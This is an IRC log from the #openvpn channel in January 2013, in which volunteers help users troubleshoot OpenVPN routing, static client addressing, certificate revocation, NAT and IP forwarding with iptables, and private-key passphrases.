[~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 08:46 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 09:00 -!- _-Jon-_ [~jon@2607:f2c0:f00f:2100:5054:ff:fe00:884e] has joined #openvpn 09:04 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:13 -!- _-Jon-_ [~jon@2607:f2c0:f00f:2100:5054:ff:fe00:884e] has quit [Quit: [BX] Reserve your copy of BitchX-1.2c02 for the Apple Newton today!] 09:16 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 09:29 -!- pelle2 [~p@nl102-232-231.student.uu.se] has joined #openvpn 09:29 < pelle2> !welcome 09:29 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 09:29 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 09:30 < pelle2> !goal 09:30 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 09:40 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 09:41 < pelle2> i just want to connect to a vpn server run by a company providing this service to let customers get another IP, but when i try to connect to it, i get an error message in the openvpn log, and since this error message occured, i can still connect (complete the initiation sequence), but i can't use the connection for actually sending any data through it 09:41 < pelle2> the error message is the following: ERROR: FreeBSD route add command failed: external program exited with error status: 1 09:42 < pelle2> does anyone have a clue as of what could possible be the cause of this? 09:42 < gladiatr> pelle2, What version of opvpn are you running on your end? 09:45 < gladiatr> the problem stems from running as a non-root user. It should be waiting to drop privileges until after the push options are processed, though. 09:45 < gladiatr> are you using any sort of up script? 09:51 <@ecrist> morning, folks 09:52 < pelle2> well, i'll try to find out, its the client that comes with pfsense 2.1, so i don't really know straight away 10:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 10:04 < pelle2> can't find it 10:04 < pelle2> do you think it's possible to fix on the client side or is it something they have changed on the server side? 10:08 < gladiatr> it is a problem on the client side. 10:08 < gladiatr> openvpn isn't in a state where it has the correct privileges to add the required routes 10:09 < gladiatr> (what the error you recounted indicates) 10:10 -!- ether0 [~ether0@72.22.83.65] has quit [Quit: Changing server] 10:16 < pelle2> hm 10:16 < pelle2> strange 10:17 < pelle2> if i knew enough about these kind of things, i guess i could add the route manually in pfsense 10:17 < gladiatr> I'd ping the pfsense people about it 10:18 < pelle2> yep 10:18 < pelle2> thanks 10:21 -!- master_of_master [~master_of@p57B52A2D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master [~master_of@p57B54DDA.dip.t-dialin.net] has joined #openvpn 10:25 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 10:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:31 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 10:48 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 10:48 -!- mode/#openvpn [+v s7r] by ChanServ 10:51 < gladiatr> np 10:53 -!- igor__ [~igor@pd907e599.dip0.t-ipconnect.de] has quit [Quit: leaving] 10:57 -!- pelle2 [~p@nl102-232-231.student.uu.se] has quit [Remote host closed the connection] 10:58 -!- pelle2 [~p@nl102-232-231.student.uu.se] has joined #openvpn 11:08 -!- raidz_away is now known as raidz 11:31 -!- pelle2 [~p@nl102-232-231.student.uu.se] has quit [Ping timeout: 276 seconds] 11:33 -!- pelle2 [~p@nl102-232-231.student.uu.se] has joined #openvpn 11:43 -!- Devastator [~devas@186.214.14.25] has joined #openvpn 11:44 -!- Devastator [~devas@186.214.14.25] has quit [Changing host] 11:44 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 11:55 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds] 12:02 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn 12:02 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host] 12:02 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 12:08 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds] 12:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn 12:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host] 12:13 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 12:15 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 12:17 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:28 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 12:37 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:44 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 244 seconds] 12:45 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds] 13:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn 13:13 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host] 13:13 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 13:21 -!- neverme [neverme@201.80.6.95] has joined #openvpn 13:22 < neverme> I was having doubt abount 1 thing on the ccd file, for example I have created the follow config file client1 with ifconfig-push 10.8.0.21 10.8.0.22, what I am having doubt with is, will that limit client1 to acquire the ip ending with 1 or will it get either ip ending .1 or .2 ? 13:22 < neverme> besides that my default openvpn conf is set to start at .50 to ensure lower numbers won't get auto acquired 13:31 -!- anonymuse [anonymuse@cpe-68-173-27-87.nyc.res.rr.com] has joined #openvpn 13:32 -!- anonymuse is now known as intransit 13:32 -!- intransit is now known as intransit[a] 13:33 -!- intransit[a] is now known as intransit 13:34 -!- intransit is now known as JesseWhite 13:41 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 14:01 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has joined #openvpn 14:02 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 14:16 < neverme> So, I might be overlooking it but from what I understood so far If I want to delivery a static ip to each client I need to create a different network to each ? for instance 10.9.1.1 - 10.9.1.2, 10.9.2.1 - 10.9.2.2 and so on or is there a reusable way to do this using the default ip 10.8.0.0 ? or to use it I need to take into account the unusable ips like if I make it 10.8.0.21 - 10.8.0.22 it will also use .20 and .23 so next would start at .25 - .26 ? 14:18 <+pekster> !net30 14:18 <@vpnHelper> "net30" is "/30" is (#1) http://openvpn.net/index.php/documentation/faq.html#slash30 explains why routed clients each use 4 ips, or (#2) you can avoid this behavior with by reading !topology 14:20 <+pekster> neverme: OpenVPN allocates a fake /30 to each client to support Windows limitations with older tap drivers; that's not required anymore with subnet topology, and Linux/Unix just uses a PtP configuration within the inside of the /30 anyway 14:21 <+pekster> (and by "tap" driver, I mean the Win32-TAP driver in tun mode; "tap driver" is just the driver name) 14:21 < neverme> !topology 14:21 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 14:21 < neverme> thanks will see what I can do 14:22 <+pekster> And, after I just scrolled up to see your earlier questio, yes, you can (and should) push static IPs that are outside of your pool range 14:23 <+pekster> When supporting Windows clients in net30 topology, you must push a pair of IPs inside a /30. In subnet mode you push an IP and netmask 14:24 <+pekster> Linux clients can use any 2 IPs. Technically you can even do this (but you should not, for obvious reasons) push "ifconfig 192.168.0.1 10.1.2.3" 14:25 < neverme> I see thanks a lot :) am looking into the topology option to see what changes I need to make etc really appreciated 14:28 -!- brute11k [~brute11k@89.249.235.33] has quit [Read error: Connection reset by peer] 14:29 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 14:29 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 14:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 14:59 < neverme> pekster so I am testing it now, however the client doesnt seem to get the ip keeps saying TEST ROUTES: 0/0 succeeded 14:59 < neverme> I am using ver 2.3.0 15:01 <+pekster> testing what? It's quite possible to use OpenVPN in a configuration that does not set any routes (hence you will need "0 of 0" network routes added.) Post some configs, because I have no clue what your setup is 15:06 < neverme> my server conf http://pastebin.com/5kDAQVEe my client1 ccd is "ifconfig-push 10.8.0.21 10.8.0.22" without double-quotes, my client1 config is equal to the sample file exept I changed the IP it needs to connect to 15:07 < neverme> im running the basic conf and am trying to assign ips 21~30 to 10 pcs 15:07 <+pekster> The 2nd argument to 'ifconfig-push' needs to be a subnet mask, not an IP 15:08 <+pekster> See the --ifconfig-push and --ifconfig parameters in the manpage for usage details, but you need a netmask there (so, 255.255.255.0 in your setup) 15:08 < neverme> I see so when I use topology subnet it must be the netmask ? 15:08 <+pekster> Yup 15:08 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 15:08 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 15:08 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 15:08 < neverme> and should I still use it as 252 or as 0 ? because there will be more than 1 sequential ip 15:08 <+pekster> You directly set a /24 netmask in subnet topology 15:09 <+pekster> The /30 stuff is for net30 topology only 15:11 < neverme> pekster sweet its working like a charm now, and yes it makes sense now I was a bit confused because with the default /30 it asked me for the ips 15:11 < neverme> thanks a lot for taking the time to help this noob ;) 15:12 <+pekster> np. Some other small suggestions: get rid of the 'ifconfig-pool-persist' option; it's mostly worthless, and can potentially cause issues (edge cases, but I've seen reports of them when duplicate IPs or something get in there, for w/e reason.) Also, if you're supporting clients that get pool IPs (ie: not staticly set in ccd files) you should set your ifconfig-pool range outside the static range 15:14 < neverme> yeah I am using .21 to .30 and the pool starts at .50 15:15 <+pekster> Not in that server setup it doesn't 15:15 < neverme> will remove the pool persist it was originally from the default config 15:15 <+pekster> The 'server' directive expands internally (see --server in the manpage for details) to use the entire range minus the IP for the server and reserved network/"broadcast" IPs 15:15 < neverme> oh, yes your right , i was reading hte bridge option 15:16 <+pekster> You can override the pool range by defining your own ifconfig-pool directive below the 'server' directive 15:16 < neverme> will do that now thanks a lot ;) 15:16 <+pekster> I think (I don't generally use the server directive - you might actually need to expand the server directive yourself. I'm not sure on that point, actually) 15:19 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 15:22 < neverme> per man ifconfig-pool 10.8.0.2 10.8.0.254 255.255.255.0 so it should be fine if I just add below it ifconfig-pool 10.8.0.50 10.8.0.100 255.255.255.0 right ? 15:23 < neverme> below the server* 15:23 -!- [1]JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 15:25 <+pekster> I guess not: Options error: --server already defines an ifconfig-pool, so you can't also specify --ifconfig-pool explicitly 15:25 <+pekster> So, expand the server directive yourself 15:25 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Quit: Leaving] 15:27 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Ping timeout: 276 seconds] 15:32 < neverme> pekster im rather confused by "expand" it, by that you mean manually change the the startup script and/or manually start the server by defining my own ifconfig, and ifconfig-pool ? 15:33 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]] 15:34 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 15:40 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 15:43 <+pekster> neverme: Expand the directive. So instead of using "server 10.8.0.0 255.255.255.0" define 'mode server' 'tls-server' 'push "topology subnet"' 'ifconfig 10.8.0.1 255.255.255.0' 'push "route-gateway 10.8.0.1"' 'ifconfig-pool 10.8.0.50 10.8.0.254' 15:43 <+pekster> etc 15:44 <+pekster> Just read the --server example in the manpage; it shows you all the expansion you would need to do 15:54 < neverme> aha now I understood it, slight change I had to do was server 10.8.0.1 10.8.0.2 rather then netmask besides that it seems to be working just fine with it pool is working 50 and above and the static ips are setting just fine. thanks a lot 16:00 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.] 16:02 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 16:03 -!- neverme [neverme@201.80.6.95] has quit [Quit: Leaving] 16:05 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:12 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 16:16 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 16:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 16:19 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 16:21 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:44 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving] 16:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 16:50 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 16:58 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has left #openvpn ["WeeChat 0.3.9.2"] 16:59 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out] 17:09 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:15 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 17:24 -!- Devastator [~devas@186.214.111.24] has joined #openvpn 17:24 -!- Devastator [~devas@186.214.111.24] has quit [Changing host] 17:24 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 17:27 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 18:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 244 seconds] 19:13 -!- raidz is now known as raidz_away 19:13 -!- blackness [~black@mobile.blackmajic.org] has joined #openvpn 19:37 -!- crhylove [~rthornton@grps-edge-4.visp.net] has joined #openvpn 19:37 < crhylove> Hi, I'm trying to get a Linux Mint laptop onto my corporate vpn. 19:37 < crhylove> Any idea what settings to use under advanced? 19:38 <+rob0> Not sure what you're asking, but it's probably something about your GUI/frontend, not openvpn itself. 19:39 <+rob0> Ask your VPN administrator how to configure the client. 19:43 < crhylove> Yeah, he's lagging. :) 19:45 -!- u0m3 [~Radu@92.80.72.203] has quit [Read error: Connection reset by peer] 20:05 < crhylove> OK, got my vpn setup. 20:05 < crhylove> What's the best rdp client these days? 20:05 < crhylove> remmina? 20:08 < crhylove> I see freerdp-x11, but I don't see a shortcut for it, and it doesn't launch from the terminal 20:08 < crhylove> :/ 20:29 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 20:44 -!- crhylove [~rthornton@grps-edge-4.visp.net] has quit [Quit: Leaving] 20:44 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn 20:45 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 20:45 < CrashTM> is it possible to disable a opvnvpn conenction that i gave to someone? 20:47 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 20:53 < blackness> http://paste.blackmajic.org:81/index.php?show=28 this describes my problem in some detail. both systems in this is debian squeeze..any ideas on why im having TLS issues? 21:16 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 21:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 21:51 <+rob0> CrashTM, either revoke the certificate (and use your CRL on the server), or use --ccd-exclusive. 22:08 <+pekster> There's also a 'disable' option you can put in a ccd file specifically for the disabled cert, although it's considered more proper to revoke and generate a CRL if this is a permenant revocation 22:11 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Read error: Connection reset by peer] 22:15 < blackness> i got OpenVPN to connect, but when i try using it i cannot connect to anything but i can resolve hosts just fine just cant 'talk' to remote systems, any ideas why? 22:17 <+pekster> My guess is that your DNS is still using your LAN, yet you have redirected traffic across the VPN where the remote endpoint fails to properly send it upstream 22:17 <+pekster> Post your server & clienet config files for further analysis: 22:17 <+pekster> !config 22:17 <@vpnHelper> (config []) -- If is given, sets the value of to . Otherwise, returns the current value of . You may omit the leading "supybot." in the name if you so choose. 22:17 <+pekster> Not that, let's try this one: 22:17 <+pekster> !configs 22:17 < blackness> one second..ill paste. 22:17 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 22:18 < blackness> http://paste.blackmajic.org:81/index.php?show=29 22:21 <+pekster> And something basic like 'ping 4.2.2.1' fails after you connect blackness ? 22:22 < blackness> yes 22:22 < blackness> it just 'hangs' 22:23 < blackness> im not using any firewall period. 22:23 < blackness> and DNS works perfectly. dont matter if i use udp, tcp for openvpn. 22:23 <+pekster> Looks like there's something wrong on the server not handling the forwarding properly. Have you properly set up source-NAT? 22:23 <+pekster> !redirect 22:23 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:23 <@vpnHelper> http://ircpimps.org/redirect.png 22:24 < blackness> !def1 22:24 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 22:24 <+pekster> You need both IP forwarding enabled and NAT configured. If you want a double-check of your NAT setup, post the output of 'iptables-save' and verify that 'cat /proc/sys/net/ipv4/ip_forward' returns the value of '1' 22:24 < blackness> should i push that from the client or server ? 22:24 < blackness> im not using iptables. 22:25 <+pekster> The way you're pushing the redirect-gateway value is fine 22:25 < blackness> and /proc/sys/../ip_forward returns 1 on the server. 22:25 <+pekster> (the push you have on the client for explicit-exit-notify is however pointless 22:25 < blackness> okay. 22:25 <+pekster> You need to use some form of NAT; if you're not using netfilter (ie: iptables) how are you performing NAT? 22:25 < blackness> i wasnt aware i needed iptables. 22:25 <+pekster> The bot's reply for "redirect" I posted above indicates NAT is required 22:25 < blackness> do i need a extensive iptables setup for that? 22:26 <+pekster> Nope 22:26 <+pekster> !linnat 22:26 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 22:26 < blackness> thats all i need to do? 22:26 <+pekster> IP forwarding also needs to be enabled: 22:26 <+pekster> !ipforward 22:26 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 22:26 <+pekster> !linipforward 22:26 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 22:27 < blackness> so i issue the first line, then the second line and thats it? 22:27 < blackness> i dont use iptables much :P 22:27 <+pekster> Right. Those only stay in memory until reboot, so you should use your distro's preferred way to make both changes persistent 22:27 < blackness> thats not an issue. :) 22:27 < blackness> i got a debian firewall-save i can modify 22:27 <+pekster> /etc/sysctl.conf is usually pretty supported across distros, but every distro does firewall save/restore differently 22:28 < blackness> but im going to test it temp incase im locked out :P 22:28 <+pekster> Yup 22:28 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 22:28 <+pekster> A cronjob to reboot 10 minutes into the future never hurts either ;) 22:28 < blackness> its a VPS..xm reboot domain :P 22:29 <+pekster> It's more fun when you lock yourself out of a physical hardware system that's in a different state with no remote hands ;) 22:33 -!- black [~black@vdsl001.client.black.blackmajic.org] has joined #openvpn 22:33 < black> ok..i got it working. 22:33 -!- blackness [~black@mobile.blackmajic.org] has quit [Ping timeout: 252 seconds] 22:33 < black> now to fix the ident 22:33 -!- black is now known as Guest90493 22:33 -!- Guest90493 [~black@vdsl001.client.black.blackmajic.org] has left #openvpn [] 22:33 -!- blackness [~black@vdsl001.client.black.blackmajic.org] has joined #openvpn 22:34 < blackness> sorry for the j/p.. 22:34 < blackness> now to figure out how to open the ports..so identd will work and what not 22:34 <+pekster> You want to run an identd on the VPN server, or forward it to your connected client? 22:35 <+pekster> (the former is easier; the latter requires a DNAT rule and binding your IP to the target IP of that rule, or opgionally doing that dynamically via a --client-connect ovpn script parameter) 22:35 < blackness> i got oidentd running on the VPN host. 22:35 < blackness> but it isnt working.. 22:35 <+pekster> Now that part I can't help you with :P 22:35 < blackness> atleast i dont think it is. 22:36 * pekster shines his "~" in front of his user 22:36 < blackness> yeah..its running but isnt working. 22:36 < blackness> i just tested it 22:36 <+pekster> I'll settle for using an X509-secured TLS connection to Freenode instead of having identd work :P 22:36 < blackness> i guess i gotta fwd all port traffic to my client? 22:37 <+pekster> You can run identd wherever you'd like; how you get it to reply with the expected value is something I have no experience with. I just send TCP reset packets on my ident port 22:37 <+pekster> (eg: IRC bouncers somehow tie the reply to the user the account is bound to) 22:38 <+pekster> I don't run a bouncer, so I only care about actively rejecting the ident query from the IRC server so I don't have to wait 10 seconds while it "tries" to get a reply on port 113 22:43 < blackness> i got oidentd running on vpn host, and vpn client and it fails..guess i gotta set the vpn dhcp ip 22:43 < blackness> root oidentd 3894 tcp4 10.8.0.6:113 *:* LISTEN :P 22:44 <+pekster> That looks like your client; a request from the server performing the connection (such as the IRC server) will reach your public IP on your VPN server, not that RFC1918 private address 22:46 < blackness> hm. 22:47 <+pekster> That's why you need SNAT to get out; your private 10.8.0/24 network doesn't actually exist as far as the rest of the Internet is concerned 22:48 < blackness> hm. 22:48 < blackness> idk if i got SNAT working currently 22:48 < blackness> i thought all the traffic was passed to the client? 22:49 <+pekster> The reply traffic is, thanks to conntrack 22:49 < blackness> what about request? 22:49 <+pekster> What request? When the client sends data to the VPN server for the outside web? 22:50 < blackness> when i send out a connection to IRC, when the IRC server request information, how would it reach the client? 22:51 < blackness> like, the HostVPN is listening *:113, should it reply what is being forwarded by the client? 22:51 <+pekster> conntrack keeps track of stateful connections, so a reply to a translated session that the client has initiated is sent back to the client 22:51 < blackness> hmm..seems this going to take a little more research :P 22:51 <+pekster> It doesn't work the other way around, because "the Internet" has no way to reach your "10.8.0.6" system. I could be using that on my private network as my home LAN 22:51 < blackness> or im going to have to write a iptables.sh aswell. 22:52 < blackness> what if i direct incoming:113 to the IP of the local lan? 22:52 <+pekster> Right, that's called destination-NAT, or DNAT, and I noted that solution above 22:52 < blackness> ahh 22:52 < blackness> i gotta learn dnat before i cann write all i need 23:03 < blackness> got it working :) 23:03 < blackness> thanks pekster 23:31 < blackness> well, i found a small bug..with my fw, i cant connect to my VPS. how do i open the ports to the host so i can SSH/VPN in? 23:50 -!- blackness [~black@vdsl001.client.black.blackmajic.org] has quit [Ping timeout: 252 seconds] --- Day changed Sat Jan 12 2013 00:07 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 00:12 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Quit: Leaving] 00:15 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 00:21 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 264 seconds] 00:26 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 01:07 -!- spricer [~mix@192-0-132-186.cpe.teksavvy.com] has joined #openvpn 01:08 < spricer> Hi, is there a way to pass certificate password to configuration file? 01:09 <+pekster> spricer: See the --askpass option in the manpage. If you're going to use that, you're really better off just decrypting the private key in the first place 01:12 < spricer> You are right I can create new certificate but just still curios in dark side :) txs 01:12 <+pekster> You don't need to create a new "Certificat" at all 01:12 <+pekster> You can decrypt the private key anytime you want 01:12 <+pekster> Or re-encrypt it with a different passphrase 01:12 <+pekster> Also on point: you don't encrypt the certificate; that's public knowledge. You encrypt the private key 01:13 < spricer> that is also true... 01:13 <+pekster> 'openssl rsa -' will output usage on managing an existing RSA key 01:14 <+pekster> eg: to decrypt one, use 'openssl rsa -in current.key -out new.key' or to set a passphrase or change it to a new one, use 'openssl rsa -in current.key -out new.key -des3' 01:44 -!- spricer [~mix@192-0-132-186.cpe.teksavvy.com] has quit [Quit: Leaving] 02:15 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 02:30 -!- havoc [~havoc@neptune.chaillet.net] has quit [Ping timeout: 244 seconds] 02:40 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 03:02 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 03:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 04:15 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 260 seconds] 04:15 -!- black_ [black@vdsl001.client.black.blackmajic.org] has joined #openvpn 04:15 -!- black_ is now known as blackness 04:20 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 04:22 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Ping timeout: 248 seconds] 04:24 -!- blackness [black@vdsl001.client.black.blackmajic.org] has quit [Ping timeout: 244 seconds] 04:26 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 04:27 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn 04:27 -!- blackness [black@vdsl001.client.black.blackmajic.org] has joined #openvpn 04:42 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 04:43 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 04:46 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn 04:50 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 05:07 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 05:13 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 05:29 -!- Mhrok [~mhrok@178-36-52-42.adsl.inetia.pl] has joined #openvpn 05:29 < Mhrok> Hello! 05:43 -!- Mhrok [~mhrok@178-36-52-42.adsl.inetia.pl] has quit [Quit: WeeChat 0.4.0-rc1] 06:27 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 06:34 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 06:43 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:59 -!- p3rror [~mezgani@2001:0:53aa:64c:74:6e1a:d607:4b7d] has joined #openvpn 07:04 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Excess Flood] 07:05 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 07:11 -!- p3rror [~mezgani@2001:0:53aa:64c:74:6e1a:d607:4b7d] has quit [Remote host closed the connection] 07:19 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 07:21 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 07:23 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 07:25 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:30 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 07:42 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 07:47 -!- cosmicgate [~root@216.17.109.26] has quit [Remote host closed the connection] 07:48 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 07:50 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 